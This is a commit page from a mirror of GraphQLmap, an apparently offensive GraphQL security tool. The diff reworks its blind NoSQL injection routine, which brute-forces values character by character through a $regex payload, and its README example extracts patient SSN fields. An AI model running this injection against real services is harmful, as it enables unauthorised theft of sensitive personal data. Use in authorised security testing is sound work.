swisskyrepo
/
GraphQLmap
mirror of https://github.com/swisskyrepo/GraphQLmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update attacks.py 

#Change : blind_nosql
#Benefits : It can find the full value without knowing its length + Avoid infinite loops.
-Removed the "data_size" parameter. Now it stops searching as soon as it no longer finds valid characters.
-Add : Ability to set a custom charset.
pull/17/head
onSec-fr 2020-04-22 11:32:48 +02:00
parent 181b05e222
commit 6176bd3afc
2 changed files with 15 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -134,7 +134,9 @@ Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
GraphQLmap > nosqli GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >
``` ```
### SQL injection ### SQL injection

20
attacks.py
View File

@ -159,24 +159,28 @@ def blind_mssql(url, method, headers):
def blind_nosql(url, method, headers): def blind_nosql(url, method, headers):
# Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} # Query - include BLIND_PLACEHOLDER. e.g. {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
# Check : "5d089c51dcab2d0032fdd08d"
query = input("Query > ") query = input("Query > ")
# Check the input (known value) against the data found - e.g. 5d089c51dcab2d0032fdd08d
check = input("Check > ") check = input("Check > ")
# Charset to use - Default abcdefghijklmnopqrstuvwxyz1234567890
charset = input("Charset > ")
if(not charset):
charset = "abcdefghijklmnopqrstuvwxyz1234567890"
data = "" data = ""
data_size = 35 _break = False
charset = "0123456789abcdef-"
while len(data) != data_size: while (_break == False):
old_data = data
for c in charset: for c in charset:
injected = query.replace("BLIND_PLACEHOLDER", data + c) injected = query.replace("BLIND_PLACEHOLDER", data + c)
r = requester(url, method, injected, headers) r = requester(url, method, injected, headers)
if check in r.text: if check in r.text:
data += c data += c
# display data and update the current line # display data and update the current line
print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False) print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False)
# Stop if no character is found
if(old_data == data):
_break = True
# force a line return to clear the screen after the data trick # force a line return to clear the screen after the data trick
print("") print("")